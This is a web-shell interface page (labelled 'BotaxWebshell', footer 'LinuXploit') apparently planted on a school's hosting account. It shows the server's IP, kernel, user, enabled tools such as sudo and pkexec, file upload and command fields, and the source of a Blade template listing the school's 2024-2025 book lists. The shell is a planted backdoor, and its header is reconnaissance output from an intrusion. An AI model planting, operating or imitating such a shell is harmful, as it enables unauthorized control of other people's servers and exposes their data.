BotaxWebshell
Server IP : 68.178.172.28  /  Your IP : 216.73.216.26
Web Server : Apache
System : Linux 28.172.178.68.host.secureserver.net 4.18.0-553.89.1.el8_10.x86_64 #1 SMP Mon Dec 8 03:53:08 EST 2025 x86_64
User : kiskarnal ( 1003)
PHP Version : 8.0.30
Disable Function : NONE
MySQL : OFF |  cURL : ON |  WGET : ON |  Perl : ON |  Python : ON |  Sudo : ON |  Pkexec : ON
Directory :  /home/kiskarnal/public_html/resources/views/front/

Upload File :
current_dir [ Writeable] document_root [ Writeable]

 

Command :


[ Back ]     

Current File : /home/kiskarnal/public_html/resources/views/front/list-of-books.blade.php
 <!-- ======= Header include ========= -->
                @include('front.includes.header')
            <!-- ======= Header include ========= -->
            
<style>
    
.action-btns {
    width: 180px;
}
    
</style>
            
<body class="home page-template-default page page-id-2039 gdlr-core-body woocommerce-no-js tribe-no-js kingster-body kingster-body-front kingster-full  kingster-with-sticky-navigation  kingster-blockquote-style-1 gdlr-core-link-to-lightbox">
    
    <div class="kingster-body-outer-wrapper ">
        <div class="kingster-body-wrapper clearfix  kingster-with-frame">
           
            <div class="kingster-page-title-wrap  kingster-style-medium kingster-left-align">
                <div class="kingster-header-transparent-substitute"></div>
                <div class="kingster-page-title-overlay"></div>
                <div class="kingster-page-title-container kingster-container">
                    <div class="kingster-page-title-content kingster-item-pdlr">
                        <div class="kingster-page-caption">Karnal International School</div>
                        <h1 class="kingster-page-title">Book List Session 2024-2025</h1>
                    </div>
                </div>
            </div>

            <div class="kingster-page-wrapper" id="kingster-page-wrapper">
                <div class="kingster-content-container kingster-container">
                    <div class=" kingster-sidebar-wrap clearfix kingster-line-height-0 kingster-sidebar-style-right py-5 my-5">
                        
                        <div class="container mb-5">

                            <div class="row justify-content-center">
                                <div class="col-md-10 col-xs-12 col-sm-12">
                                    <div class="table-responsive">
                                        <table class="table table-striped table-bordered book-list-table">
                                        <thead>
                                            <tr>
                                                <th>
                                                    <p class="mb-0">Sr. no</p>
                                                </th>
                                                <th>
                                                    <p class="mb-0">Class</p>
                                                </th>
                                                <th>
                                                    <p class="mb-0">View / Download</p>
                                                </th>
                                            </tr>
                                        </thead>
                                        <tbody>
                                            <tr>
                                                <td>#</td>
                                                <td>UNDERTAKING OF ADHERENCE OF PROVISION OF THE AFFILIATION BYE LAWS OF RULE NO.2.4.7(B) AND CBSE CIRCULAR NO. CBSE/CIRCULAR NO./11/2019/1464499 DATED 18.03.2019</td>
                                                <td>
                                                    <div class="action-btns">
                                                        <a href="{{asset('/')}}/assets/pdf/UNDERTAKING-OF-ADHERENCE-OF-PROVISION.pdf" class="mr-2 viewpdf" target="_blank"><i class="fa fa-eye"></i>&ensp;View</a>
                                                        <a href="{{asset('/')}}/assets/pdf/UNDERTAKING-OF-ADHERENCE-OF-PROVISION.pdf" class="ml-2 downloadpdf " download="UNDERTAKING OF ADHERENCE OF PROVISION OF THE AFFILIATION BYE LAWS OF RULE NO.2.4.7(B) AND CBSE CIRCULAR NO. CBSE/CIRCULAR NO./11/2019/1464499 DATED 18.03.2019">
                                                            <i class="fa fa-download"></i>&ensp;Download
                                                        </a>
                                                    </div>
                                                </td>
                                            </tr>
                                           @foreach($books as $book) 
                                            <tr>
                                                <td>{{$loop->index+1}}</td>
                                                <td><p class="mb-0">{{$book->class_name}}</p></td>
                                                <td>
                                                    <div class="action-btns">
                                                        <a href="{{asset('images/'.$book->file)}}" class="mr-2 viewpdf" target="_blank"><i class="fa fa-eye"></i>&ensp;View</a>
                                                        <a href="{{asset('images/'.$book->file)}}" class="ml-2 downloadpdf " download="Ist Class Books">
                                                            <i class="fa fa-download"></i>&ensp;Download
                                                        </a>
                                                    </div>
                                                </td>
                                            </tr>
                                            @endforeach
                                        </tbody>
                                    </table>
                                    </div>
                                </div>
                            </div>

                        </div>

                    </div>
                </div>
            </div>

            <!-- ======= Footer include ========= -->
                @include('front.includes.footer')
            <!-- ======= Footer include ========= -->
        </div>
    </div>

Youez - 2016 - github.com/yon3zu
LinuXploit